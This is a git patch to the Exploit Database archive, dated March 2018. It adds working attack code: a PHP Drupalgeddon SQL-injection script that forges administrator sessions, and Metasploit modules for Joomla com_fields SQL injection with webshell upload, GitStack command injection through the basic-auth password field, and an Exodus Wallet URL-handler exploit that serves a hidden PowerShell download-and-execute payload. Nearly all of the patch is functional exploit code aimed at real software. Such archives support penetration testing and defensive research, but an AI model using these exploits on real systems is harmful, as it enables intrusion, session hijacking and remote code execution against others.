From 4a4b338844538cb62fb5758c628d49bbdcdbe1a5 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 30 Mar 2018 05:01:51 +0000 Subject: [PATCH] DB: 2018-03-30 8 changes to exploits/shellcodes GitStack - Unsanitized Argument Remote Code Execution (Metasploit) Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit) Drupal 7.0 < 7.31 - SQL Injection (1) Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) Drupal 7.0 < 7.31 - SQL Injection (2) Drupal 7.32 - SQL Injection (PHP) Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) Drupal < 7.32 - Unauthenticated SQL Injection Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) Joomla Component Fields - SQLi Remote Code Execution (Metasploit) --- exploits/php/webapps/34984.py | 6 +- exploits/php/webapps/{34992.txt => 34992.py} | 0 exploits/php/webapps/44355.php | 71 +++++ exploits/php/webapps/44358.rb | 269 +++++++++++++++++ exploits/windows/remote/44356.rb | 301 +++++++++++++++++++ exploits/windows/remote/44357.rb | 104 +++++++ files_exploits.csv | 12 +- 7 files changed, 757 insertions(+), 6 deletions(-) rename exploits/php/webapps/{34992.txt => 34992.py} (100%) mode change 100644 => 100755 create mode 100644 exploits/php/webapps/44355.php create mode 100755 exploits/php/webapps/44358.rb create mode 100755 exploits/windows/remote/44356.rb create mode 100755 exploits/windows/remote/44357.rb diff --git a/exploits/php/webapps/34984.py b/exploits/php/webapps/34984.py index 93608cc3d..df8b7b045 100755 --- a/exploits/php/webapps/34984.py +++ b/exploits/php/webapps/34984.py @@ -1,5 +1,7 @@ -#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 -#Creditz to https://www.reddit.com/user/fyukyuk +# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 +# Creditz to https://www.reddit.com/user/fyukyuk +# EDB Note ~ Updated version: https://github.com/kenorb/drupageddon/blob/master/drupal_7.x_sql_injection_sa-core-2014-005.py + import urllib2,sys from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py host = sys.argv[1] diff --git a/exploits/php/webapps/34992.txt b/exploits/php/webapps/34992.py old mode 100644 new mode 100755 similarity index 100% rename from exploits/php/webapps/34992.txt rename to exploits/php/webapps/34992.py diff --git a/exploits/php/webapps/44355.php b/exploits/php/webapps/44355.php new file mode 100644 index 000000000..e7765d7f3 --- /dev/null +++ b/exploits/php/webapps/44355.php @@ -0,0 +1,71 @@ + +//· + +include 'common.inc'; +include 'password.inc'; + +// set values +$user_name = 'admin'; + +$url = isset($argv[1])?$argv[1]:''; +$user_id = isset($argv[2])?intval($argv[2]):1; + +if ($url == '-h') { + echo "usage:\n"; + echo $argv[0].' $url [$user_id]'."\n"; + die(); +} + +if (empty($url) || strpos($url,'https') === False) { + echo "please state the cookie url. It works only with https urls.\n"; + die(); +} + +if (strpos($url, 'www.') === 0) { + $url = substr($url, 4); +} + +$url = rtrim($url,'/'); + +list( , $session_name) = explode('://', $url, 2); + +// use insecure cookie with sql inj. +$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32); +$password = user_hash_password('test'); + +$session_id = drupal_random_key(); +$sec_ssid = drupal_random_key(); + +$inject = "UNION SELECT $user_id,'$user_name','$password','','','',null,0,0,0,1,null,'',0,'',null,$user_id,'$session_id','','127.0.0.1',0,0,null -- "; + +$cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid; + +// send the request to the server +$ch = curl_init($url); + +curl_setopt($ch,CURLOPT_HEADER,True); +curl_setopt($ch,CURLOPT_RETURNTRANSFER,True); +curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False); +curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0'); + +curl_setopt($ch,CURLOPT_HTTPHEADER,array( + 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language: en-US,en;q=0.5' +)); + +curl_setopt($ch,CURLOPT_COOKIE,$cookie); + +$output = curl_exec($ch); + +curl_close($ch); + +echo "Session with this ID created:\n"; +echo "S".$cookieName.": ".$sec_ssid; \ No newline at end of file diff --git a/exploits/php/webapps/44358.rb b/exploits/php/webapps/44358.rb new file mode 100755 index 000000000..5dbb4c647 --- /dev/null +++ b/exploits/php/webapps/44358.rb @@ -0,0 +1,269 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::HTTP::Joomla + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Joomla Component Fields SQLi Remote Code Execution', + 'Description' => %q{ + This module exploits a SQL injection vulnerability in the com_fields + component, which was introduced to the core of Joomla in version 3.7.0. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mateus Lino', # Vulnerability discovery + 'luisco100 ' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2017-8917' ], # SQLi + [ 'EDB', '42033' ], + [ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ] + ], + 'Payload' => + { + 'DisableNops' => true, + # Arbitrary big number. The payload gets sent as POST data, so + # really it's unlimited + 'Space' => 262144, # 256k + }, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Joomla 3.7.0', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'May 17 2017', + 'DefaultTarget' => 0)) + + end + + def check + # Request using a non-existing table + val = sqli(rand_text_alphanumeric(rand(10)+6), 'check') + + if val.nil? + return Exploit::CheckCode::Safe + else + return Exploit::CheckCode::Vulnerable + end + end + + + def sqli(tableprefix, option) + # SQLi will grab Super User or Administrator sessions with a valid username and userid (else they are not logged in). + # The extra search for userid!=0 is because of our SQL data that's inserted in the session cookie history. + # This way we make sure that's excluded and we only get real Administrator or Super User sessions. + if option == 'check' + start = rand_text_alpha(5) + start_h = start.unpack('H*')[0] + fin = rand_text_alpha(5) + fin_h = fin.unpack('H*')[0] + + sql = "(UPDATEXML(2170,CONCAT(0x2e,0x#{start_h},(SELECT MID((IFNULL(CAST(TO_BASE64(table_name) AS CHAR),0x20)),1,22) FROM information_schema.tables order by update_time DESC LIMIT 1),0x#{fin_h}),4879))" + else + start = rand_text_alpha(3) + start_h = start.unpack('H*')[0] + fin = rand_text_alpha(3) + fin_h = fin.unpack('H*')[0] + + sql = "(UPDATEXML(2170,CONCAT(0x2e,0x#{start_h},(SELECT MID(session_id,1,42) FROM #{tableprefix}session where userid!=0 LIMIT 1),0x#{fin_h}),4879))" + end + + # Retrieve cookies + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'vars_get' => { + 'option' => 'com_fields', + 'view' => 'fields', + 'layout'=> 'modal', + 'list[fullordering]' => sql + } + }) + + if res && res.code == 500 && res.body =~ /#{start}(.*)#{fin}/ + return $1 + end + return nil + end + + + def exploit + # Request using a non-existing table first, to retrieve the table prefix + val = sqli(rand_text_alphanumeric(rand(10)+6), 'check') + if val.nil? + fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix") + else + table_prefix = Base64.decode64(val) + table_prefix.sub! '_session', '' + print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]") + end + + # Retrieve the admin session using our retrieved table prefix + val = sqli("#{table_prefix}_", 'exploit') + if val.nil? + fail_with(Failure::Unknown, "#{peer}: No logged-in Administrator or Super User user found!") + else + auth_cookie_part = val + print_status("#{peer} - Retrieved cookie [ #{auth_cookie_part} ]") + end + + # Retrieve cookies + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php') + }) + + if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/ + cookie_begin = $1 + print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]") + else + fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie") + end + + # Modify cookie to authenticated admin + auth_cookie = cookie_begin + auth_cookie << '=' + auth_cookie << auth_cookie_part + auth_cookie << ';' + + # Authenticated session + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'), + 'cookie' => auth_cookie + }) + + if res && res.code == 200 && res.body =~ /Control Panel -(.*?)- Administration/ + print_good("#{peer} - Successfully authenticated") + else + fail_with(Failure::Unknown, "#{peer} - Session failure") + end + + # Retrieve template view + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'), + 'cookie' => auth_cookie, + 'vars_get' => { + 'option' => 'com_templates', + 'view' => 'templates' + } + }) + + # We try to retrieve and store the first template found + if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&view=template&id=([0-9]+)&file=([a-zA-Z0-9=]+)/ + template_id = $1 + file_id = $2 + + form = res.body.split(/
]+) method="post" name="adminForm" id="adminForm"\>(.*)<\/form>/mi) + input_hidden = form[2].split(/]+)\/>/mi) + input_id = input_hidden[7].split("\"") + input_id = input_id[1] + + else + fail_with(Failure::Unknown, "Unable to retrieve template") + end + + + + filename = rand_text_alphanumeric(rand(10)+6) + # Create file + print_status("#{peer} - Creating file [ #{filename}.php ]") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'), + 'cookie' => auth_cookie, + 'vars_get' => { + 'option' => 'com_templates', + 'task' => 'template.createFile', + 'id' => template_id, + 'file' => file_id, + }, + 'vars_post' => { + 'type' => 'php', + 'address' => '', + input_id => '1', + 'name' => filename + } + }) + + # Grab token + if res && res.code == 303 && res.headers['Location'] + location = res.headers['Location'] + print_status("#{peer} - Following redirect to [ #{location} ]") + res = send_request_cgi( + 'uri' => location, + 'method' => 'GET', + 'cookie' => auth_cookie + ) + + # Retrieving template token + if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/ + token = $1 + print_status("#{peer} - Token [ #{token} ] retrieved") + else + fail_with(Failure::Unknown, "#{peer} - Retrieving token failed") + end + + if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/ + template_path = $1 + print_status("#{peer} - Template path [ #{template_path} ] retrieved") + else + fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path") + end + + else + fail_with(Failure::Unknown, "#{peer} - Creating file failed") + end + + filename_base64 = Rex::Text.encode_base64("/#{filename}.php") + + # Inject payload data into file + print_status("#{peer} - Insert payload into file [ #{filename}.php ]") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), + 'cookie' => auth_cookie, + 'vars_get' => { + 'option' => 'com_templates', + 'view' => 'template', + 'id' => template_id, + 'file' => filename_base64, + }, + 'vars_post' => { + 'jform[source]' => payload.encoded, + 'task' => 'template.apply', + token => '1', + 'jform[extension_id]' => template_id, + 'jform[filename]' => "/#{filename}.php" + } + }) + + if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/ + print_status("#{peer} - Payload data inserted into [ #{filename}.php ]") + else + fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]") + end + + # Request payload + register_files_for_cleanup("#{filename}.php") + print_status("#{peer} - Executing payload") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, template_path, "#{filename}.php"), + 'cookie' => auth_cookie + }) + end +end \ No newline at end of file diff --git a/exploits/windows/remote/44356.rb b/exploits/windows/remote/44356.rb new file mode 100755 index 000000000..db623df84 --- /dev/null +++ b/exploits/windows/remote/44356.rb @@ -0,0 +1,301 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Powershell + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'GitStack Unsanitized Argument RCE', + 'Description' => %q{ + This module exploits a remote code execution vulnerability that + exists in GitStack through v2.3.10, caused by an unsanitized argument + being passed to an exec function call. This module has been tested + on GitStack v2.3.10. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Kacper Szurek', # Vulnerability discovery and PoC + 'Jacob Robles' # Metasploit module + ], + 'References' => + [ + ['CVE', '2018-5955'], + ['EDB', '43777'], + ['EDB', '44044'], + ['URL', 'https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Targets' => [['Automatic', {}]], + 'Privileged' => true, + 'DisclosureDate' => 'Jan 15 2018', + 'DefaultTarget' => 0)) + end + + def check_web + begin + res = send_request_cgi({ + 'uri' => '/rest/settings/general/webinterface/', + 'method' => 'GET' + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + + if res && res.code == 200 + if res.body =~ /true/ + vprint_good('Web interface is enabled') + return true + else + vprint_error('Web interface is disabled') + return false + end + else + print_error('Unable to determine status of web interface') + return nil + end + end + + def check_repos + begin + res = send_request_cgi({ + 'uri' => '/rest/repository/', + 'method' => 'GET', + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + if res && res.code == 200 + begin + mylist = res.get_json_document + rescue JSON::ParserError => e + print_error("Failed: #{e.class} - #{e.message}") + return nil + end + + if mylist.length == 0 + vprint_error('No repositories found') + return false + else + vprint_good('Repositories found') + return mylist + end + else + print_error('Unable to determine available repositories') + return nil + end + end + + def update_web(web) + data = {'enabled' => web} + begin + res = send_request_cgi({ + 'uri' => '/rest/settings/general/webinterface/', + 'method' => 'PUT', + 'data' => data.to_json + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + if res && res.code == 200 + vprint_good("#{res.body}") + end + end + + def create_repo + repo = Rex::Text.rand_text_alpha(5) + c_token = Rex::Text.rand_text_alpha(5) + begin + res = send_request_cgi({ + 'uri' => '/rest/repository/', + 'method' => 'POST', + 'cookie' => "csrftoken=#{c_token}", + 'vars_post' => { + 'name' => repo, + 'csrfmiddlewaretoken' => c_token + } + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + if res && res.code == 200 + vprint_good("#{res.body}") + return repo + else + print_status('Unable to create repository') + return nil + end + end + + def delete_repo(repo) + begin + res = send_request_cgi({ + 'uri' => "/rest/repository/#{repo}/", + 'method' => 'DELETE' + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + + if res && res.code == 200 + vprint_good("#{res.body}") + else + print_status('Failed to delete repository') + end + end + + def create_user + user = Rex::Text.rand_text_alpha(5) + pass = user + begin + res = send_request_cgi({ + 'uri' => '/rest/user/', + 'method' => 'POST', + 'vars_post' => { + 'username' => user, + 'password' => pass + } + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + if res && res.code == 200 + vprint_good("Created user: #{user}") + return user + else + print_error("Failed to create user") + return nil + end + end + + def delete_user(user) + begin + res = send_request_cgi({ + 'uri' => "/rest/user/#{user}/", + 'method' => 'DELETE' + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + if res && res.code == 200 + vprint_good("#{res.body}") + else + print_status('Delete user unsuccessful') + end + end + + def mod_user(repo, user, method) + begin + res = send_request_cgi({ + 'uri' => "/rest/repository/#{repo}/user/#{user}/", + 'method' => method + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + if res && res.code == 200 + vprint_good("#{res.body}") + else + print_status('Unable to add/remove user from repo') + end + end + + def repo_users(repo) + begin + res = send_request_cgi({ + 'uri' => "/rest/repository/#{repo}/user/", + 'method' => 'GET' + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + if res && res.code == 200 + begin + users = res.get_json_document + users -= ['everyone'] + rescue JSON::ParserError => e + print_error("Failed: #{e.class} - #{e.message}") + users = nil + end + else + return nil + end + return users + end + + def run_exploit(repo, user, cmd) + begin + res = send_request_cgi({ + 'uri' => '/web/index.php', + 'method' => 'GET', + 'authorization' => basic_auth(user, "#{Rex::Text.rand_text_alpha(1)} && cmd /c #{cmd}"), + 'vars_get' => { + 'p' => "#{repo}.git", + 'a' => 'summary' + } + }) + rescue Rex::ConnectionError, Errno::ECONNRESET => e + print_error("Failed: #{e.class} - #{e.message}") + end + end + + def exploit + command = cmd_psh_payload( + payload.encoded, + payload_instance.arch.first, + { :remove_comspec => true, :encode_final_payload => true } + ) + fail_with(Failure::PayloadFailed, "Payload exceeds space left in exec call") if command.length > 6110 + + web = check_web + repos = check_repos + + if web.nil? || repos.nil? + return + end + + unless web + update_web(!web) + # Wait for interface + sleep 8 + end + + if repos + pwn_repo = repos[0]['name'] + else + pwn_repo = create_repo + end + + r_users = repo_users(pwn_repo) + if r_users.present? + pwn_user = r_users[0] + run_exploit(pwn_repo, pwn_user, command) + else + pwn_user = create_user + if pwn_user + mod_user(pwn_repo, pwn_user, 'POST') + run_exploit(pwn_repo, pwn_user, command) + mod_user(pwn_repo, pwn_user, 'DELETE') + delete_user(pwn_user) + end + end + + unless web + update_web(web) + end + + unless repos + delete_repo(pwn_repo) + end + end +end \ No newline at end of file diff --git a/exploits/windows/remote/44357.rb b/exploits/windows/remote/44357.rb new file mode 100755 index 000000000..ccc983091 --- /dev/null +++ b/exploits/windows/remote/44357.rb @@ -0,0 +1,104 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/powershell' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ManualRanking + + include Msf::Exploit::EXE + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Exodus Wallet (ElectronJS Framework) remote Code Execution', + 'Description' => %q( + This module exploits a Remote Code Execution vulnerability in Exodus Wallet, + a vulnerability in the ElectronJS Framework protocol handler can be used to + get arbitrary command execution if the user clicks on a specially crafted URL. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Wflki', # Original exploit author + 'Daniel Teixeira' # MSF module author + ], + 'DefaultOptions' => + { + 'SRVPORT' => '80', + 'URIPATH' => '/', + }, + 'References' => + [ + [ 'EDB', '43899' ], + [ 'BID', '102796' ], + [ 'CVE', '2018-1000006' ], + ], + 'Platform' => 'win', + 'Targets' => + [ + ['PSH (Binary)', { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] + }] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 25 2018' + )) + + register_advanced_options( + [ + OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]), + ], self.class + ) + end + + def gen_psh(url) + ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl + + download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) + + download_and_run = "#{ignore_cert}#{download_string}" + + return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run) + end + + def serve_payload(cli) + data = cmd_psh_payload(payload.encoded, + payload_instance.arch.first, + remove_comspec: true, + exec_in_place: true + ) + + print_status("Delivering Payload") + send_response_html(cli, data, 'Content-Type' => 'application/octet-stream') + end + + def serve_page(cli) + psh = gen_psh("#{get_uri}payload") + psh_escaped = psh.gsub("\\","\\\\\\\\").gsub("'","\\\\'") + val = rand_text_alpha(5) + + html = %Q| + + + +| + send_response_html(cli, html) + end + + def on_request_uri(cli, request) + case request.uri + when /payload$/ + serve_payload(cli) + else + serve_page(cli) + end + end + +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 0eb52275f..726d5660e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -16361,6 +16361,8 @@ id,file,description,date,author,type,platform,port 44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows, 44345,exploits/windows/remote/44345.txt,"Acrolinx Server < 5.2.5 - Directory Traversal",2018-03-26,"Berk Dusunur",remote,windows, 44349,exploits/linux/remote/44349.md,"TestLink Open Source Test Management < 1.9.16 - Remote Code Execution (PoC)",2018-03-27,"Manish Tanwar",remote,linux, +44356,exploits/windows/remote/44356.rb,"GitStack - Unsanitized Argument Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows, +44357,exploits/windows/remote/44357.rb,"Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -34400,13 +34402,13 @@ id,file,description,date,author,type,platform,port 34974,exploits/php/webapps/34974.txt,"WordPress Plugin WP Survey And Quiz Tool 1.2.1 - Cross-Site Scripting",2010-11-08,"John Leitch",webapps,php, 34994,exploits/cgi/webapps/34994.txt,"OpenWrt 10.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-13,"dave b",webapps,cgi, 34995,exploits/php/webapps/34995.txt,"Simea CMS - 'index.php' SQL Injection",2010-11-16,Cru3l.b0y,webapps,php, -34984,exploits/php/webapps/34984.py,"Drupal 7.0 < 7.31 - SQL Injection (1)",2014-10-16,fyukyuk,webapps,php, +34984,exploits/php/webapps/34984.py,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)",2014-10-16,stopstene,webapps,php, 34988,exploits/php/webapps/34988.txt,"PHPShop 2.1 EE - 'name_new' Cross-Site Scripting",2010-11-10,MustLive,webapps,php, 34989,exploits/php/webapps/34989.txt,"WeBid 0.85P1 - Multiple Input Validation Vulnerabilities",2010-11-10,"John Leitch",webapps,php, 34990,exploits/php/webapps/34990.txt,"Ricoh Web Image Monitor 2.03 - Cross-Site Scripting",2010-11-09,thelightcosine,webapps,php, 34996,exploits/php/webapps/34996.txt,"Raised Eyebrow CMS - 'venue.php' SQL Injection",2010-11-16,Cru3l.b0y,webapps,php, -34992,exploits/php/webapps/34992.txt,"Drupal 7.0 < 7.31 - SQL Injection (2)",2014-10-17,"Claudio Viviani",webapps,php, -34993,exploits/php/webapps/34993.php,"Drupal 7.32 - SQL Injection (PHP)",2014-10-17,"Dustin Dörr",webapps,php, +34992,exploits/php/webapps/34992.py,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)",2014-10-17,"Claudio Viviani",webapps,php, +34993,exploits/php/webapps/34993.php,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)",2014-10-17,"Dustin Dörr",webapps,php, 35004,exploits/php/webapps/35004.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (1)",2010-11-18,"High-Tech Bridge SA",webapps,php, 35008,exploits/cgi/webapps/35008.txt,"Hot Links SQL 3.2 - 'report.cgi' SQL Injection",2010-11-22,"Aliaksandr Hartsuyeu",webapps,cgi, 35012,exploits/multiple/webapps/35012.txt,"ZYXEL P-660R-T1 V2 - 'HomeCurrent_Date' Cross-Site Scripting",2010-11-23,"Usman Saeed",webapps,multiple, @@ -34505,7 +34507,7 @@ id,file,description,date,author,type,platform,port 35145,exploits/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' SQL Injection",2010-12-27,Dr.NeT,webapps,php, 35146,exploits/php/webapps/35146.txt,"PHP < 5.6.2 - 'Shellshock' 'disable_functions()' Bypass Command Injection",2014-11-03,"Ryan King (Starfall)",webapps,php, 35149,exploits/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",webapps,php, -35150,exploits/php/webapps/35150.php,"Drupal < 7.32 - Unauthenticated SQL Injection",2014-11-03,"Stefan Horst",webapps,php,443 +35150,exploits/php/webapps/35150.php,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)",2014-11-03,"Stefan Horst",webapps,php,443 35155,exploits/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,webapps,php, 35156,exploits/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 - 'help.php' Cross-Site Scripting",2010-12-28,waraxe,webapps,php, 35157,exploits/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 - 'searchnew.php' Cross-Site Scripting",2010-12-28,waraxe,webapps,php, @@ -39055,3 +39057,5 @@ id,file,description,date,author,type,platform,port 44352,exploits/windows/webapps/44352.txt,"Microsoft Windows Remote Assistance - XML External Entity Injection",2018-03-28,"Nabeel Ahmed",webapps,windows, 44353,exploits/hardware/webapps/44353.sh,"Tenda N11 Wireless Router 5.07.43_en_NEX01 - Remote DNS Change",2018-03-28,"Todor Donev",webapps,hardware, 44354,exploits/php/webapps/44354.txt,"Open-AuditIT Professional 2.1 - Cross-Site Scripting",2018-03-28,"Nilesh Sapariya",webapps,php, +44355,exploits/php/webapps/44355.php,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)",2014-11-03,"Stefan Horst",webapps,php,443 +44358,exploits/php/webapps/44358.rb,"Joomla Component Fields - SQLi Remote Code Execution (Metasploit)",2018-03-29,Metasploit,webapps,php,